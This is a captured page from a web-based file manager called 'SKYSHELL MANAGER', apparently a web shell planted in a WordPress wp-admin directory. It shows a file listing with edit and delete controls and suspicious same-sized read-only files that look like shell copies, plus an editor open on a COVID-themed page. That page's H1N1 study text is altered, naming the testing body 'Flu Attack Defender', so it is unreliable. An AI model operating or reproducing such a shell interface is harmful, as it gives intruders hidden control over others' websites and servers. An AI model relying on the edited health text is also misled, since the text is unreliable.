📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-ajax.php
5.03 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: pandemic.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="shortcut icon" href="assets/images/favicon.ico" type="image/x-icon"> <link rel="icon" href="assets/images/favicon.ico" type="image/x-icon"> <title>Coniv - Coronavirus (COVID-19) Medical Prevention HTML Template</title> <!-- Bootstrap --> <link href="assets/css/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/font-awesome.min.css" rel="stylesheet"> <link href="assets/css/magnific-popup.css" rel="stylesheet"> <link href="assets/css/jquery-ui.css" rel="stylesheet"> <link href="assets/css/animate.css" rel="stylesheet"> <link href="assets/css/owl.carousel.min.css" rel="stylesheet"> <!-- Main css --> <link href="assets/css/main.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <!-- Preloader --> <div class="preloader"> <div class="lds-default"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div> </div><!-- /Preloader --> <!--Header Area--> <header class="header-area fixed-header"> <nav class="navbar navbar-expand-lg main-menu"> <div class="container"> <a class="navbar-brand" href="index.php"><img src="assets/images/logo3.png" class="d-inline-block align-top" alt=""></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="menu-toggle"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav m-auto"> <li class="nav-item"> <a class="nav-link" href="index.php">Home</a> </li> <li class="nav-item"><a class="nav-link" href="about.php">About us</a></li> <li class="nav-item active"><a class="nav-link" href="worst-pandemics.php">Worst Pandemics</a></li> <li class="nav-item"><a class="nav-link" href="testing.php">Testing Centers</a></li> <li class="nav-item"><a class="nav-link" href="contact.php">Contact</a></li> </ul> <div class="header-btn justify-content-end"> <a href="prevention.html" class="bttn-small btn-fill">+800 564 8367</a> </div> </div> </div> </nav> </header><!--/Header Area--> <!--breadcrumb area--> <section class="breadcrumb-area dark-overlay" style="background: url('assets/images/banners/1.jpg') no-repeat fixed;"> <div class="container"> <div class="row"> <div class="col-xl-8 col-lg-8 col-md-12 col-sm-12"> <div class="banner-title"> <h2>Emergence of pandemic 2009 influenza A H1N1, India </h2> </div> <ul> <li><a href="index.php">Home</a></li> <li>Blog Details</li> </ul> </div> </div> </div> </section> <!--/breadcrumb area--> <!--Blog Area--> <section class="blog-area section-padding-2"> <div class="container"> <div class="row"> <h4 style="margin-bottom:20px;">Emergence of pandemic 2009 influenza A H1N1, India</h4> <div class="col-xl-8 col-lg-8 col-md-8 col-sm-12"> <div class="blog-details"> <h5>Background & objectives:</h5><br> <p style="text-align:justify;">Pandemic H1N1 caused deluge of cases from 74 countries and prompted World Health Organization to raise warning to phase 6. The present study was conducted on throat and nasal swab samples received and tested at National Centre for Disease Control, Delhi, India during 2009-2010 to collect epidemiological and clinical information on positive cases.</p> <h5>Methods:</h5><br> <p style="text-align:justify;">Throat and nasopharyngeal swabs from category C influenza A H1N1 patients during May 2009-September 2010 along with their clinico-epidemiological details were collected from identified hospitals from Delhi and other States. Samples were tested by Real time reverse transcriptase PCR using primers and probes developed at CDC, Atlanta for four influenza target genes.</p> </div> </div> <div class="col-xl-4 col-lg-4 col-md-4 col-sm-6"> <div class="site-sidebar"> <img src="assets/images/influenza.jpg" title="" alt=""/> </div> </div> <div style="padding:0px 15px;"> <h5><b>Results:</b></h5><br> <p style="text-align:justify;">A total of 33,751 samples, both throat and nasal swab samples from each patient were tested for H1N1 influenza virus, of which, 7943 (23.5%) were positive for pandemic influenza A H1N1 and 3759 (11.1%) were positive for influenza A (seasonal flu). Maximum number of positive cases (N=2792, 35.1%) were from 20-39 yr age group, comprising 1790 (22.5%) males and 1182 (14.8%) females. Only 2620 (33%) positive cases were close contact of influenza A H1N1 positive patient. Majority cases presented (N=2792, 35.1%) with fever 7005 (88.1%), followed by 6133 cases (77.2%) exhibiting fever and cough, 377 (4.7%) complained of fever, cough, nasal catarrh and 362 (4.5%) cases had fever with shortness of breath.</p> </div> <div style="padding:0px 15px;"> <h5>Interpretation & conclusions:</h5><br> <p style="text-align:justify;">The study showed a peak of cases of pandemic influenza A H1N1 in December 2009 and indicated predominance of H1N1 positive cases among 20-39 yr age group and among males compared to females.</p> </div> <div style="padding:0px 15px;"> <p style="text-align:justify;">Respiratory illnesses due to influenza virus infection are a major cause of morbidity and mortality worldwide. Lower respiratory tract infections are a leading cause of deaths in developing countries and are also the third leading cause of death worldwide. Globally influenza is responsible for 250,000 to 500,000 deaths annually1.</p> </div> <div style="padding:0px 15px;"> <h5>Material & Methods:</h5><br> <p style="text-align:justify;">Flu Attack Defender, is an apex public health institution and during the H1N1 pandemic 2009-2010, it was declared as the nodal agency for testing of samples of H1N1 from all over the country. This study was a retrospective analysis of the clinical epidemiological information consisting of clinical presentations, history of contact among H1N1 positive persons and positivity rate of different types of influenza viruses in these samples..</p> <p style="text-align:justify;">Throat and nasal swabs were collected (during May 2009 - September 2010) from 11 designated government hospitals in Delhi and many different States of the country and tested for influenza A H1N1. As per the Ministry of Health & Family Welfare (MOHFW) guidelines on categorization of H1N1 cases8, only category C patients were subjected to testing for H1N1. Although all patients included in the study were categorized as category C, but none of the patients complained of somnolence, inability to feed well, convulsions, or worsening of underlying chronic conditions during admission.</p> <p style="text-align:justify;">A total of 33,751 throat swabs and nasal swabs/nasopharyngeal swabs were collected by clinicians in viral transport medium (VTM) from category C patients, and sent to NCDC under triple packaging cold chain conditions from different parts of the country including Delhi. Samples were accompanied with duly filled proforma indicating demographic characteristics, date of onset of symptoms, co-morbidities, travel/contact history, antiviral treatment, etc.</p> </div> </div> </section><!--/Blog Area--> </div> <!--Footer Area--> <!--Footer Area--> <footer class="footer-area section-padding black-bg-2"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-10 col-lg-10 col-md-12 col-sm-12"> <div class="footer-logo centered mb-4"> <img src="assets/images/logo3.png" alt=""> </div> <div class="footer-nav"> <ul> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Conditions</a></li> <li><a href="subcribe.php">Subscribe</a></li> <li><a href="un-subscribe.php">Un-Subscribe</a></li> </ul> </div> <div class="copyright"> <p>Copyright © 2020 All Rights Reserved</p> </div> </div> </div> </div> </footer><!--/Footer Area--> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="assets/js/jquery-3.2.1.min.js"></script> <script src="assets/js/jquery-migrate.js"></script> <script src="assets/js/jquery-ui.js"></script> <script src="assets/js/popper.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/owl.carousel.min.js"></script> <script src="assets/js/magnific-popup.min.js"></script> <script src="assets/js/imagesloaded.pkgd.min.js"></script> <script src="assets/js/isotope.pkgd.min.js"></script> <script src="assets/js/waypoints.min.js"></script> <script src="assets/js/jquery.counterup.min.js"></script> <script src="assets/js/wow.min.js"></script> <script src="assets/js/scrollUp.min.js"></script> <script src="assets/js/script.js"></script> </body> </html>
Save